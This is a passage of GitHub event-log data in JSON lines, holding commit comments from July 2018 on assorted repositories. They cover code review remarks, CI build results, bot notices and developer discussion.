for=\"exampleFormControlTextarea1\">Example textarea</label>\r\n                    <textarea class=\"form-control\" id=\"exampleFormControlTextarea1\" rows=\"3\" style=\"width:100%; padding-left:10px; padding-right:10px; padding-bottom:10px; margin:auto;\"></textarea>\r\n                </div>\r\n            </form>\r\n        </div>\r\n    </div>\r\n</div>\r\n```"}},"created_at":"2018-07-14T17:50:27Z"}
{"id":"7966126837","type":"CommitCommentEvent","actor":{"login":"mwojtkowski"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29710009,"position":null,"line":null,"path":null,"commit_id":"9924643cb4a507f1dfbfa402d46ca46797405454","created_at":"2018-07-14T17:51:32Z","updated_at":"2018-07-14T17:51:32Z","author_association":"OWNER","body":"I went to Orgrimmar to check how much CPU it takes ( merged your changes )\r\n- no combat, no target ~100ms\r\n- no combat/combat with target 200ms ( old scripts  can be cause for such high CPU ms )\r\nHealth, Wild Imps are quite CPU hog they generate crazy amount of scans + refreshNeeded\r\n\r\nAfter some testing \r\n- changed Health to scan pet, player, target\r\n- as you suggested merged Player buffs / debuffs scan into one option and removed \"Laptop Mode\"\r\n- fixed Wild Imps\r\n\r\nI'v changed how Frome refresh work \r\n- changed refresh from forced 50ms to variable refresh it basicly let Ovale refresh itself from events firing but not faster than minimum refresh value and not slower than maximum.\r\n- Out of combat wile targeting something that you can attack refresh is set to maximum refresh rate\r\n- Out of combat with no target refresh is set to 1000ms. ( or could be disabled ? )\r\n- If Ovale is hidden refresh is disabled\r\n\r\nYou still can achieve same thing as before by setting both sliders to same value ( I've changed max slider values to min 50 max 400 )\r\n\r\nWith above changes CPU \r\n- out of combat ~2ms\r\n- in combat with 3 enemy nameplates visible ( no casting just pet keeping me in combat ) ~17ms\r\n- in combat doing normal rotation ~40ms \r\nall that with ~20 ppl hitting dummies around me\r\n\r\n"}},"created_at":"2018-07-14T17:51:32Z"}
{"id":"7966127321","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710011,"position":null,"line":null,"path":null,"commit_id":"4015829486bce3a4cc33c08675d7c6bce9b5d51b","created_at":"2018-07-14T17:51:55Z","updated_at":"2018-07-14T17:51:55Z","author_association":"NONE","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4015829486bce3a4cc33c08675d7c6bce9b5d51b-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2018-07-14T17:51:55Z"}
{"id":"7966127358","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29710012,"position":null,"line":null,"path":null,"commit_id":"d6f0ad58d2bf5e0204e482abe4b9b16ca7d0bc49","created_at":"2018-07-14T17:51:57Z","updated_at":"2018-07-14T17:51:57Z","author_association":"OWNER","body":"@steadicat no, I have not"}},"created_at":"2018-07-14T17:51:57Z"}
{"id":"7966127444","type":"CommitCommentEvent","actor":{"login":"clemsciences"},"repo":{"name":"cltk/cltk"},"payload":{"comment":{"id":29710013,"position":55,"line":66,"path":"cltk/phonology/syllabify.py","commit_id":"a2326070b5f06165502dd52e2e3f61d087a92654","created_at":"2018-07-14T17:52:01Z","updated_at":"2018-07-14T17:52:01Z","author_association":"MEMBER","body":"```python\r\nreturn [onset for onset in onset_dict if onset_dict[onset]/n > threshold]\r\n```\r\nor \r\n```python\r\nreturn [onset for onset, i in onset_dict.items() if i/n > threshold]\r\n```"}},"created_at":"2018-07-14T17:52:01Z"}
{"id":"7966129309","type":"CommitCommentEvent","actor":{"login":"aomalov"},"repo":{"name":"sunny14/Euler"},"payload":{"comment":{"id":29710016,"position":60,"line":60,"path":"src/main/java/src/main/java/com.faina.test/euler12/Euler12.java","commit_id":"163136b2f166ea8b628a3cc574ab3b58098821e6","created_at":"2018-07-14T17:53:29Z","updated_at":"2018-07-14T17:53:29Z","author_association":"NONE","body":"Loop condition is not dependant on looping variable - this makes loop estimation unclear\r\nUse while to make clear loop logic"}},"created_at":"2018-07-14T17:53:29Z"}
{"id":"7966130480","type":"CommitCommentEvent","actor":{"login":"aomalov"},"repo":{"name":"sunny14/Euler"},"payload":{"comment":{"id":29710017,"position":63,"line":63,"path":"src/main/java/src/main/java/com.faina.test/euler12/Euler12.java","commit_id":"163136b2f166ea8b628a3cc574ab3b58098821e6","created_at":"2018-07-14T17:54:27Z","updated_at":"2018-07-14T17:54:27Z","author_association":"NONE","body":"Count divisors on sqrt(currentTrianleNum) and multiply it by 2"}},"created_at":"2018-07-14T17:54:27Z"}
{"id":"7966131402","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Piyush3079/phpmyadmin"},"payload":{"comment":{"id":29710018,"position":null,"line":null,"path":null,"commit_id":"5f56b0d0207e654401621345ef21d92b81802b53","created_at":"2018-07-14T17:55:13Z","updated_at":"2018-07-14T17:55:13Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: js/src/messages.php"}},"created_at":"2018-07-14T17:55:13Z"}
{"id":"7966131727","type":"CommitCommentEvent","actor":{"login":"DeckardShaw"},"repo":{"name":"nichcream/android_device_xiaomi_land"},"payload":{"comment":{"id":29710020,"position":225,"line":19,"path":"libshims/bionic/pthread_cond.cpp","commit_id":"1a91dc38940399817ac270e4a75af3c2b7de7d8f","created_at":"2018-07-14T17:55:27Z","updated_at":"2018-07-14T17:55:27Z","author_association":"NONE","body":"😂😂\n\nOn Sat 14 Jul, 2018, 10:08 PM wj, <notifications@github.com> wrote:\n\n> U r the biggest pain in my life.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/nichcream/android_device_xiaomi_land/commit/1a91dc38940399817ac270e4a75af3c2b7de7d8f#commitcomment-29709813>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AWeKgzQDLr5mBqFqP2lcHQUbtMYj8RjRks5uGh5wgaJpZM4VP6m_>\n> .\n>\n"}},"created_at":"2018-07-14T17:55:27Z"}
{"id":"7966131894","type":"CommitCommentEvent","actor":{"login":"aomalov"},"repo":{"name":"sunny14/Euler"},"payload":{"comment":{"id":29710022,"position":29,"line":38,"path":"src/main/java/src/test/java/Euler12Test.java","commit_id":"163136b2f166ea8b628a3cc574ab3b58098821e6","created_at":"2018-07-14T17:55:37Z","updated_at":"2018-07-14T17:55:37Z","author_association":"NONE","body":"Why initialize Biginteger from String ? Int might be a more natural boxing , right ?"}},"created_at":"2018-07-14T17:55:37Z"}
{"id":"7966133038","type":"CommitCommentEvent","actor":{"login":"rob-p"},"repo":{"name":"splatlab/mantis"},"payload":{"comment":{"id":29710023,"position":null,"line":null,"path":null,"commit_id":"0cb106db642859d07f6d29512464b3a0dfb23fd9","created_at":"2018-07-14T17:56:31Z","updated_at":"2018-07-14T17:56:31Z","author_association":"COLLABORATOR","body":"Silly bug with a functional effect on any testing?"}},"created_at":"2018-07-14T17:56:31Z"}
{"id":"7966133270","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710024,"position":null,"line":null,"path":null,"commit_id":"4015829486bce3a4cc33c08675d7c6bce9b5d51b","created_at":"2018-07-14T17:56:41Z","updated_at":"2018-07-14T17:56:41Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4015829486bce3a4cc33c08675d7c6bce9b5d51b-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T17:56:41Z"}
{"id":"7966134833","type":"CommitCommentEvent","actor":{"login":"aomalov"},"repo":{"name":"sunny14/Euler"},"payload":{"comment":{"id":29710026,"position":52,"line":52,"path":"src/main/java/src/main/java/com.faina.test/euler12/Euler12.java","commit_id":"163136b2f166ea8b628a3cc574ab3b58098821e6","created_at":"2018-07-14T17:57:53Z","updated_at":"2018-07-14T17:57:53Z","author_association":"NONE","body":"there is a more lightweight definition of lambda in java8, reduced syntax"}},"created_at":"2018-07-14T17:57:53Z"}
{"id":"7966136893","type":"CommitCommentEvent","actor":{"login":"aomalov"},"repo":{"name":"sunny14/Euler"},"payload":{"comment":{"id":29710033,"position":50,"line":50,"path":"src/main/java/src/main/java/com.faina.test/euler12/Euler12.java","commit_id":"163136b2f166ea8b628a3cc574ab3b58098821e6","created_at":"2018-07-14T17:59:32Z","updated_at":"2018-07-14T17:59:32Z","author_association":"NONE","body":"No clear use-case for functional interfaces is in place. No generification, parametrization.\r\nKeep if-else logic simple"}},"created_at":"2018-07-14T17:59:32Z"}
{"id":"7966136917","type":"CommitCommentEvent","actor":{"login":"vali20012001"},"repo":{"name":"vali20012001/Texasvalisi"},"payload":{"comment":{"id":29710034,"position":null,"line":null,"path":null,"commit_id":"873e072bb3ac04bfd36cd249c3ca93dbaa916422","created_at":"2018-07-14T17:59:33Z","updated_at":"2018-07-14T17:59:33Z","author_association":"OWNER","body":"I'm new and lost::))"}},"created_at":"2018-07-14T17:59:33Z"}
{"id":"7966139170","type":"CommitCommentEvent","actor":{"login":"tom-sqlprosolutions"},"repo":{"name":"tom-sqlprosolutions/hello-source-control"},"payload":{"comment":{"id":29710042,"position":null,"line":null,"path":null,"commit_id":"b56d3a24225420a4af1461a53d878a9785acbb7d","created_at":"2018-07-14T18:01:13Z","updated_at":"2018-07-14T18:01:13Z","author_association":"OWNER","body":"We used a soft reset in the local repo to roll up the individual commits into a cohesive single commit."}},"created_at":"2018-07-14T18:01:13Z"}
{"id":"7966140198","type":"CommitCommentEvent","actor":{"login":"bturner"},"repo":{"name":"brettwooldridge/NuProcess"},"payload":{"comment":{"id":29710045,"position":43,"line":49,"path":"src/main/java/com/zaxxer/nuprocess/linux/EpollEvent.java","commit_id":"4989a9edc2a8f0dbed19bc03b9dfaa6a0963067d","created_at":"2018-07-14T18:01:59Z","updated_at":"2018-07-14T18:01:59Z","author_association":"CONTRIBUTOR","body":"I found your pull request to Buck (facebook/buck#1794) and the discussion re: alignment. and it looks like the report is for ARM64. I don't have ready access to something where I can test that.\r\n\r\nFor the moment, the simplest \"fix\" might be to switch back to `ALIGN_GNUC` and comment out/ignore my size test. Ostensibly that'll \"fix\" the alignment on ARM64, where `epoll_event` apparently is 16 bytes, per the comments, and get past the current issues so they can accept the upgrade. It might be worth including some comments in the code, if you do that, to indicate that it will not be possible to poll for multiple events at once due to alignment issues on different platforms.\r\n\r\nIn the long run it seems like a bigger change may be necessary, because it appears how alignment is handled for `epoll_event` is not consistent between platforms. (Which is only mildly surprising; \"Linux\" is, at best, a moving target.) A change that allow NuProcess to detect the platform and set the alignment accordingly, or even \"just\" (quotes because I hate that word, when it comes to software development) adds a system property that can be used to explicitly configure the alignment to use, may be necessary eventually, to allow for \"correct\" alignment on individual platforms."}},"created_at":"2018-07-14T18:01:59Z"}
{"id":"7966140826","type":"CommitCommentEvent","actor":{"login":"tom-sqlprosolutions"},"repo":{"name":"tom-sqlprosolutions/hello-source-control"},"payload":{"comment":{"id":29710047,"position":null,"line":null,"path":null,"commit_id":"03cb59bf1cb6eccdd6819740eea7c084cdbec087","created_at":"2018-07-14T18:02:28Z","updated_at":"2018-07-14T18:02:28Z","author_association":"OWNER","body":"We used a mixed commit to roll up more after we had pushed the prior rollup to the remote."}},"created_at":"2018-07-14T18:02:28Z"}
{"id":"7966141514","type":"CommitCommentEvent","actor":{"login":"tom-sqlprosolutions"},"repo":{"name":"tom-sqlprosolutions/hello-source-control"},"payload":{"comment":{"id":29710048,"position":null,"line":null,"path":null,"commit_id":"03cb59bf1cb6eccdd6819740eea7c084cdbec087","created_at":"2018-07-14T18:02:59Z","updated_at":"2018-07-14T18:02:59Z","author_association":"OWNER","body":"We also used an add * which resulted in the .vs folder being added."}},"created_at":"2018-07-14T18:02:59Z"}
{"id":"7966142138","type":"CommitCommentEvent","actor":{"login":"FakelsHub"},"repo":{"name":"phobos2077/sfall"},"payload":{"comment":{"id":29710053,"position":3,"line":2,"path":"artifacts/ddraw.ini","commit_id":"09c9c5cce009d742b515b0656383ce1af5a277ce","created_at":"2018-07-14T18:03:25Z","updated_at":"2018-07-14T18:03:25Z","author_association":"CONTRIBUTOR","body":"Why did you decide to jump immediately to this version, it is better to make 'minor' version 4.1 more stable, than 'build' version of 4.0."}},"created_at":"2018-07-14T18:03:25Z"}
{"id":"7966142764","type":"CommitCommentEvent","actor":{"login":"FakelsHub"},"repo":{"name":"phobos2077/sfall"},"payload":{"comment":{"id":29710057,"position":6,"line":26,"path":"sfall/version.h","commit_id":"09c9c5cce009d742b515b0656383ce1af5a277ce","created_at":"2018-07-14T18:03:54Z","updated_at":"2018-07-14T18:03:54Z","author_association":"CONTRIBUTOR","body":"Why did you decide to jump immediately to this version, it is better to make 'minor' version 4.1 more stable, than 'build' version of 4.0."}},"created_at":"2018-07-14T18:03:54Z"}
{"id":"7966143743","type":"CommitCommentEvent","actor":{"login":"Korab-Doroci"},"repo":{"name":"Korab-Doroci/my-first-repository"},"payload":{"comment":{"id":29710061,"position":6,"line":4,"path":"test.py","commit_id":"fa6f070717ec42d7ed7d3aea1e303cc534523d9f","created_at":"2018-07-14T18:04:38Z","updated_at":"2018-07-14T18:04:38Z","author_association":"OWNER","body":"why is there two ' ' '"}},"created_at":"2018-07-14T18:04:38Z"}
{"id":"7966143773","type":"CommitCommentEvent","actor":{"login":"FakelsHub"},"repo":{"name":"phobos2077/sfall"},"payload":{"comment":{"id":29710062,"position":11,"line":30,"path":"sfall/version.h","commit_id":"09c9c5cce009d742b515b0656383ce1af5a277ce","created_at":"2018-07-14T18:04:39Z","updated_at":"2018-07-14T18:04:39Z","author_association":"CONTRIBUTOR","body":"Why did you decide to jump immediately to this version, it is better to make 'minor' version 4.1 more stable, than 'build' version of 4.0."}},"created_at":"2018-07-14T18:04:39Z"}
{"id":"7966145515","type":"CommitCommentEvent","actor":{"login":"miguelsousa"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29710068,"position":null,"line":null,"path":null,"commit_id":"675977f1d8afdeedd771fd7b48934a5c353108cf","created_at":"2018-07-14T18:05:57Z","updated_at":"2018-07-14T18:05:57Z","author_association":"MEMBER","body":"@khaledhosny this commit was holding up AppVeyor, so I cancelled https://ci.appveyor.com/project/adobe-type-tools/psautohint/build/1.0.329"}},"created_at":"2018-07-14T18:05:57Z"}
{"id":"7966146030","type":"CommitCommentEvent","actor":{"login":"baxandrei"},"repo":{"name":"NamelessMC/Nameless"},"payload":{"comment":{"id":29710070,"position":null,"line":null,"path":null,"commit_id":"de8a8c52099f729be9a774d1c2b8b775ff97e9dd","created_at":"2018-07-14T18:06:20Z","updated_at":"2018-07-14T18:06:20Z","author_association":"CONTRIBUTOR","body":"custom/templates/HCRPG/profile.tpl: https://pastebin.com/93QgQtYD\r\nmodules/Core/pages/admin/core.php: https://pastebin.com/F8M4R4CR\r\nmodules/Core/pages/profile.php: https://pastebin.com/Ck9AUg3C"}},"created_at":"2018-07-14T18:06:20Z"}
{"id":"7966147168","type":"CommitCommentEvent","actor":{"login":"TiagoSantos81"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29710073,"position":null,"line":null,"path":null,"commit_id":"1a1dc7f0752a523aab44a899485fd06ba6db7f31","created_at":"2018-07-14T18:07:16Z","updated_at":"2018-07-14T18:07:16Z","author_association":"MEMBER","body":"@marcoagpinto You had already added those. I grouped them in a single rule. Check:\r\n\r\n```\r\n  <rulegroup id='SPECIAL_COMPARATIVES' name=\"Comparativos Especiais\">\r\n    <!--      Created by Marco A.G.Pinto, Portuguese rule      -->\r\n    <rule>\r\n      <antipattern>\r\n          <token>mais</token>\r\n          <token regexp='yes'>bo[am]</token>\r\n          <token>que</token>\r\n          <token regexp='yes'>m(?:á|au)</token>\r\n      </antipattern>\r\n      <pattern>\r\n          <token>mais</token>\r\n          <token regexp='yes'>bo[am]</token>\r\n```\r\nI added all the remaining special comparatives as well."}},"created_at":"2018-07-14T18:07:16Z"}
{"id":"7966147437","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29710074,"position":null,"line":null,"path":null,"commit_id":"675977f1d8afdeedd771fd7b48934a5c353108cf","created_at":"2018-07-14T18:07:30Z","updated_at":"2018-07-14T18:07:30Z","author_association":"MEMBER","body":"thanks. It appears that me and Khaled can't cancel Appveyor builds even when logged with the adobe-type-tools appveyor org. Maybe we need more privileges than collaborator in the appveyor settings, dunno"}},"created_at":"2018-07-14T18:07:30Z"}
{"id":"7966147738","type":"CommitCommentEvent","actor":{"login":"VovaLejt"},"repo":{"name":"VovaLejt/PHP-functions"},"payload":{"comment":{"id":29710076,"position":null,"line":null,"path":null,"commit_id":"119fd7d9c41446de3879ac5794ae6946b4415eaa","created_at":"2018-07-14T18:07:45Z","updated_at":"2018-07-14T18:07:45Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-14T18:07:45Z"}
{"id":"7966149212","type":"CommitCommentEvent","actor":{"login":"VovaLejt"},"repo":{"name":"VovaLejt/PHP-functions"},"payload":{"comment":{"id":29710081,"position":null,"line":null,"path":null,"commit_id":"119fd7d9c41446de3879ac5794ae6946b4415eaa","created_at":"2018-07-14T18:08:58Z","updated_at":"2018-07-14T18:08:58Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-14T18:08:58Z"}
{"id":"7966151941","type":"CommitCommentEvent","actor":{"login":"miguelsousa"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29710085,"position":null,"line":null,"path":null,"commit_id":"675977f1d8afdeedd771fd7b48934a5c353108cf","created_at":"2018-07-14T18:11:00Z","updated_at":"2018-07-14T18:11:00Z","author_association":"MEMBER","body":"OK. I'll look into it later."}},"created_at":"2018-07-14T18:11:00Z"}
{"id":"7966154688","type":"CommitCommentEvent","actor":{"login":"samerton"},"repo":{"name":"NamelessMC/Nameless"},"payload":{"comment":{"id":29710089,"position":null,"line":null,"path":null,"commit_id":"de8a8c52099f729be9a774d1c2b8b775ff97e9dd","created_at":"2018-07-14T18:13:12Z","updated_at":"2018-07-14T18:13:12Z","author_association":"MEMBER","body":"Do you have any custom fields created that are **not** public?"}},"created_at":"2018-07-14T18:13:12Z"}
{"id":"7966154689","type":"CommitCommentEvent","actor":{"login":"jaymichls"},"repo":{"name":"tweeres04/drinktracker"},"payload":{"comment":{"id":29710090,"position":null,"line":null,"path":null,"commit_id":"42323283701d3e15a568a1b1f4fcf50c889fd9ec","created_at":"2018-07-14T18:13:12Z","updated_at":"2018-07-14T18:13:12Z","author_association":"COLLABORATOR","body":"Nice!"}},"created_at":"2018-07-14T18:13:12Z"}
{"id":"7966156274","type":"CommitCommentEvent","actor":{"login":"baxandrei"},"repo":{"name":"NamelessMC/Nameless"},"payload":{"comment":{"id":29710092,"position":null,"line":null,"path":null,"commit_id":"de8a8c52099f729be9a774d1c2b8b775ff97e9dd","created_at":"2018-07-14T18:14:27Z","updated_at":"2018-07-14T18:14:27Z","author_association":"CONTRIBUTOR","body":"http://prntscr.com/k6gnlw no. even when I delete it, nothing appears."}},"created_at":"2018-07-14T18:14:27Z"}
{"id":"7966156935","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29710094,"position":null,"line":null,"path":null,"commit_id":"9f2ad5ce747973bdf1e72e3c5ba1213c0e1023fa","created_at":"2018-07-14T18:15:01Z","updated_at":"2018-07-14T18:15:01Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Criar ChangeSet para Cep](https://trello.com/c/o7JgTm6l/33-criar-changeset-para-cep)"}},"created_at":"2018-07-14T18:15:01Z"}
{"id":"7966158893","type":"CommitCommentEvent","actor":{"login":"samerton"},"repo":{"name":"NamelessMC/Nameless"},"payload":{"comment":{"id":29710103,"position":null,"line":null,"path":null,"commit_id":"de8a8c52099f729be9a774d1c2b8b775ff97e9dd","created_at":"2018-07-14T18:16:26Z","updated_at":"2018-07-14T18:16:26Z","author_association":"MEMBER","body":"@baxandrei I can't reproduce any issues, I'm afraid I can't do anything until I can do so."}},"created_at":"2018-07-14T18:16:26Z"}
{"id":"7966159386","type":"CommitCommentEvent","actor":{"login":"Alucard648"},"repo":{"name":"WohlSoft/PGE-Project"},"payload":{"comment":{"id":29710104,"position":null,"line":null,"path":null,"commit_id":"c5b443823f266048431b6072ee672d12ad01fc58","created_at":"2018-07-14T18:16:50Z","updated_at":"2018-07-14T18:16:50Z","author_association":"NONE","body":"Once animated sizeables support reaches stable state, it would be good to showcase it on YouTube.  "}},"created_at":"2018-07-14T18:16:50Z"}
{"id":"7966160590","type":"CommitCommentEvent","actor":{"login":"marcoagpinto"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29710109,"position":null,"line":null,"path":null,"commit_id":"1a1dc7f0752a523aab44a899485fd06ba6db7f31","created_at":"2018-07-14T18:17:52Z","updated_at":"2018-07-14T18:17:52Z","author_association":"MEMBER","body":"ahhhhh... oki :-)\r\n"}},"created_at":"2018-07-14T18:17:52Z"}
{"id":"7966160737","type":"CommitCommentEvent","actor":{"login":"punoqun"},"repo":{"name":"GitBusting/CalendarApp"},"payload":{"comment":{"id":29710110,"position":null,"line":null,"path":null,"commit_id":"a1e5b5021f6620cc977a8292443143e4611229b2","created_at":"2018-07-14T18:18:00Z","updated_at":"2018-07-14T18:18:00Z","author_association":"CONTRIBUTOR","body":"Also upgraded various other dependencies.\r\n"}},"created_at":"2018-07-14T18:18:00Z"}
{"id":"7966161048","type":"CommitCommentEvent","actor":{"login":"Wohlstand"},"repo":{"name":"WohlSoft/PGE-Project"},"payload":{"comment":{"id":29710111,"position":null,"line":null,"path":null,"commit_id":"c5b443823f266048431b6072ee672d12ad01fc58","created_at":"2018-07-14T18:18:18Z","updated_at":"2018-07-14T18:18:18Z","author_association":"MEMBER","body":"I also still need to implement that to editor side"}},"created_at":"2018-07-14T18:18:18Z"}
{"id":"7966163822","type":"CommitCommentEvent","actor":{"login":"TiagoSantos81"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29710116,"position":null,"line":null,"path":null,"commit_id":"1a1dc7f0752a523aab44a899485fd06ba6db7f31","created_at":"2018-07-14T18:20:32Z","updated_at":"2018-07-14T18:20:32Z","author_association":"MEMBER","body":"Sorry Marco, I was looking into the wrong page and thought you re-added the rule. It was all right from the start! (it is now grouped, anyway)"}},"created_at":"2018-07-14T18:20:32Z"}
{"id":"7966164423","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710118,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-14T18:20:59Z","updated_at":"2018-07-14T18:20:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:20:59Z"}
{"id":"7966164826","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710119,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-14T18:21:19Z","updated_at":"2018-07-14T18:21:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:21:19Z"}
{"id":"7966165090","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Piyush3079/phpmyadmin"},"payload":{"comment":{"id":29710121,"position":null,"line":null,"path":null,"commit_id":"2f8ac0e5b6045ea732d65f28defc9b30420bc4d7","created_at":"2018-07-14T18:21:32Z","updated_at":"2018-07-14T18:21:32Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: js/src/messages.php"}},"created_at":"2018-07-14T18:21:32Z"}
{"id":"7966174164","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29710145,"position":null,"line":null,"path":null,"commit_id":"4015829486bce3a4cc33c08675d7c6bce9b5d51b","created_at":"2018-07-14T18:28:57Z","updated_at":"2018-07-14T18:28:57Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1687 of 1687 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4015829486bce3a4cc33c08675d7c6bce9b5d51b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4015829486bce3a4cc33c08675d7c6bce9b5d51b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4015829486bce3a4cc33c08675d7c6bce9b5d51b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-14T18:28:57Z"}
{"id":"7966174214","type":"CommitCommentEvent","actor":{"login":"prashantpandey"},"repo":{"name":"splatlab/mantis"},"payload":{"comment":{"id":29710146,"position":null,"line":null,"path":null,"commit_id":"0cb106db642859d07f6d29512464b3a0dfb23fd9","created_at":"2018-07-14T18:29:00Z","updated_at":"2018-07-14T18:29:00Z","author_association":"MEMBER","body":"yeah, I was amazed seeing the mst weight. It's so close to the total number of color classes."}},"created_at":"2018-07-14T18:29:00Z"}
{"id":"7966174411","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710147,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-14T18:29:11Z","updated_at":"2018-07-14T18:29:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:29:11Z"}
